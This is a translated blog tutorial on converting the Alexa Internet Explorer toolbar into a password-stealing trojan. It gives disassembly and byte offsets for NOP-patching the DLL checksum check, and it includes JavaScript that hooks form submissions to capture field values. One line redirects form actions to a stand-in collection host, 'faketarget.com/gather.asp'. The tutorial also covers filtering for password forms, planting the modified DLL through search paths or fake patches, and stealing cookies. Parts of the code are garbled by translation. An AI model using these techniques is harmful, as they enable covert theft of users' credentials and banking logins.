Convert Alexa toolbar into a Trojan

Convert Alexa toolbar into a Trojan

From: http://www.neeao.com/blog/article-4118.html

Alexa is a Web site that publishes global website rankings and its web site is http://www.alexa.com. Alexa collects access data from global websites by installing the Alexa toolbar on the client, ranking global websites based on the data, similar to statistics on TV rating. Alexa toolbar is an Internet Explorer plug-in similar to Google Toolbar. You can download it from the URL below: http://download.alexa.com/index.cgi.

I. How Alexa works

Alexa tool bar is an Internet Plug-in based on BHO and toolbar bands technology. It exists in the system as a DLL file and is a COM component. ie will load it into its own process at runtime, therefore, the firewall generally cannot prohibit the software from accessing the network, which provides inherent convenience for the trojan role and has the following advantages over the local sniff software's password collection: whether it is an HTTP or HTTPS website, whether or not the communication channel is encrypted, as long as it is an IE page form can be collected. For detailed principles, refer to Alexa ranking fraud solutions (http: // www.donews.net/tabris17/archive/2004/09/20/104018.aspx)

After the Alexa toolbar is installed, the system generates two DLL files, alxtb1.dll and alxres. dll, in some cases alxtb2.dll, instead of alxtb1.dll, in the system directory. That's because the Alexa toolbar is automatically updated online ). The main binary code of the Alexa toolbar is stored in the alxtb1.dll file. This file is also registered into multiple COM components. It completes the com interfaces of BHO and toolbar bands, the webbrowser control of IE is encapsulated as a COM component for alxres. DLL call. Alxres. DLL files only contain a small amount of binary code. A large amount of code is HTML and JavaScript code. They exist in alxres as resources. in the DLL file, you can use Res: // alxres. dll/chtml/about.html to access these resources. Maybe you will wonder: why is the software code written in Javascript not a website? This is where the Alexa tool is spam. The main interface of the Alexa toolbar is implemented by HTML + JavaScript. These JavaScript codes call the COM interface implemented by alxtb1.dll to implement all functions of the software. This not only results in low software efficiency, but also produces a large amount of resource leaks. It is definitely a development mode of very super sb, however, it makes it easy for us to modify the Alexa toolbar-without the knowledge of cracker, we can modify the code of the Alexa toolbar as long as a PE resource modification tool.

Ii. Crack the Alexa Toolbar

Of course, Alexa is not really silly. It is never so stupid that you can use resource modification tools to modify your code. In order to prevent the resources in alxres. dll from being modified at will, he adopted the file checksum protection method. If the file is found to be modified, it will refuse to be loaded. We must crack this protection mechanism before modifying the code.

Alxtb1.dll exports a function named checksumresources, which is used to calculate the file checksum. Use c32asm to disassemble the alxres. dll file, view the string call list, find the "checksumresources" string, and jump to the code that calls the string at 100017c0. Flip a few lines down, find a jump at 100017f6, use the brute-force method, and use the NOP command to overwrite the jnz command. In layman's terms: alxres. the DLL file offset "0x17f6" is changed to "90 90" for the two bytes "75 11". You can use hexadecimal editing software such as winhex to modify it.

: 100017c0: 68 9c700010 push 1000709c/: byjmp jmpby: 100017a4, 100017b1,/->: checksumresources

: 100017c5: 57 push EDI

: 100017c6: ff15 1c500010 call [1000501c] >>>: kernel32.dll: getprocaddress

: 100017cc: 85c0 test eax, eax

: 100017ce: 74 0e je short 100017de/: jmpdown

: 100017d0: 8d4d DC Lea ECx, [EBP-24]

: 100017d3: 51 push ECx

: 100017d4: ff35 44740010 push dword ptr [10007444]

: 100017da: ffd0 call eax

: 100017dc: 59 pop ECx

: 100017dd: 59 pop ECx

: 100017de: 57 push EDI/: byjmp jmpby: 100017ce,

: 100017df: ff15 18500010 call [10005018] >>>: kernel32.dll: freelibrary

: 100017e5: 8d45 B8 Lea eax, [EBP-48]

: 100017e8: 50 push eax

: 100017e9: 8d45 DC Lea eax, [EBP-24]

: 100017ec: 50 push eax

: 100017ed: E8 ae060000 call 10001ea0/: jmpdown

: 100017f2: 59 pop ECx

: 100017f3: 85c0 test eax, eax

: 100017f5: 59 pop ECx

: 100017f6: 75 11 jnz short 10001809/: jmpdown; modify this

Now we can modify resources in alxres. dll with no scrubs. Refer to the new version of Alexa toolbar Cracking Method (http://www.donews.net/tabris17/archive/2004/10/18/137121.aspx)

3. modify the code of the Alexa Toolbar

Anyone familiar with IE programming knows that the dwebbrowserevents2 interface is used to receive webbrowser Event Notifications. We can find these functions in the JavaScript code of alxres. dll. In Res: // alxres. dll/script/EVT. class. javaScript code contains a series of JavaScript Functions that correspond to members of the dwebbrowserevents2 interface, such as documentcomplete-> bp_ondocumentcomplete, navigatecomplete2-> bp_onnavigatecomplete, beforenavigate2-> callback. According to the dwebbrowserevents2 interface, we can intercept postdata in beforenavigate2, but this interface is not fully implemented in alxres. DLL code. The prototype in the dwebbrowserevents2 interface is:

Void beforenavigate2 (idispatch * Pdisp,

Variant * & URL,

Variant * & flags,

Variant * & targetframename,

Variant * & postdata,

Variant * & headers,

Variant_bool * & cancel

);

Postdata contains post data. The function prototype of bp_onbeforenavigate:

Function bp_onbeforenavigate (oparentwebbrowser2, owebbrowser2, Surl, bpostdata, sheaders );

Bpostdata is only a Boolean variable. This cannot be achieved. You must try another method.

In general, the username and password we enter in IE are submitted to the server through the form. If the content of the form can be intercepted before the form is submitted, the password can be stolen. In JavaScript, as long as the "onsubmit" event of the form is processed, the content of the form can be processed before submission. Alxres. dll is implemented by JavaScript, so we don't need to deal with complicated com interfaces, but directly use JavaScript.

Here, we recommend that you use resource hacker to modify resources in alexres. dll, which is much better than exists.

4. intercepting webpage Form Content

My current method is similar to "Cross-Site Scripting Vulnerability ". Let's take a look at the "bp_ondocumentcomplete" function in "res: // alxres. dll/script/EVT. Class. js:

Function bp_ondocumentcomplete (oparentwebbrowser2, owebbrowser2, Surl );

This function is called when IE's current browser page is loaded. The owebbrowser2 parameter can be used as the window object of the page currently being browsed by IE. If you know JavaScript, the next step is very simple. Add the following code:

Function bp_ondocumentcomplete (oparentwebbrowser2, owebbrowser2, Surl ){

......

Try {

For (I = 0; I

{

Owebbrowser2.document. Forms [I]. onsubmit = test;

}

} Catch (e ){}

Return false;

}

This code is used to enumerate all form objects on the current page and define onsubmit events for these forms. The test function is completed:

Function Test ()

{

Try {

Window. Alert ("I can get the value! ");

For (I = 0; I

{

If (this. elements [I]. Name! = "")

{

Window. Alert (this. elements [I]. Name + ":" + this. elements [I]. value );

// Do some thing

}

}

} Catch (e ){}

Return true;

}

However, this method has some disadvantages: When a form is submitted using the Javascript statement "Submit ()", no "onsubmit" event will be generated, the above Code cannot record the content of the form. You can solve this problem by changing the form submission address:

Function bp_ondocumentcomplete (oparentwebbrowser2, owebbrowser2, Surl ){

......

Try {

For (I = 0; I

{

Owebbrowser2.document.forms% I }.innerhtml#owebbrowser2.doc ument. Forms [I]. innerhtml + "";

Owebbrowser2.document. Forms [I]. Action = "http://www.faketarget.com/gather.asp ";

}

} Catch (e ){}

Return false;

}

The above code has problems with some pages, and sometimes it is impossible to add hidden fields to the form.

5. Spread and implant Trojans

The above code is implemented by modifying the alxres. dll file with PE resource software. Therefore, you only need to replace the existing alxres. dll file with the new alxres. dll file. When the Alexa toolbar is loaded, it takes precedence over "C:/program files/Internet Explorer" and "C: /Documents and Settings/[username]/desktop "Search for alxres. DLL, so you can also change the modified alxres. place the DLL in these two paths, so that you do not need to overwrite the source file. As for how to install it, there are a lot of IE vulnerabilities waiting for you to go to exploit. This is not the scope of this article.

The "User-Agent" of IE installed with the Alexa toolbar is marked with the "Alexa toolbar", so it is easy to tell whether the target IE has installed the Alexa toolbar:

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa toobar)

You can also modify the Alexa Installation File or release it in the name of the Alexa patch.

6. Collect passwords

You can use the FileSystemObject control to record the form content to a file, or directly send it as a parameter to a Web server, which collects records. To filter out some forms that do not contain passwords on the client, it is best to check the collected form data in the alxres. DLL code:

Function Test ()

{

VaR ispwdform = false;

VaR formstr;

Try {

For (I = 0; I

{

If (this. elements [I]. Name! = "")

{

If (this. elements [I]. type = "password ")

Ispwdform = true;

Formstr = formstr + this. elements [I]. Name + "=" + this. elements [I]. Value + "&";

}

}

If (ispwdform)

{

// The form contains the Password text for collection

}

} Catch (e ){}

Return true;

}

7. Other applications

Most online banking login interfaces are implemented by ActiveX controls and cannot intercept form data. However, we can manipulate and modify the browsing pages through the "owebbrowser2" object, of course, you can also forge an online banking login interface. It can also be used to collect records of users' web pages or steal users' cookies.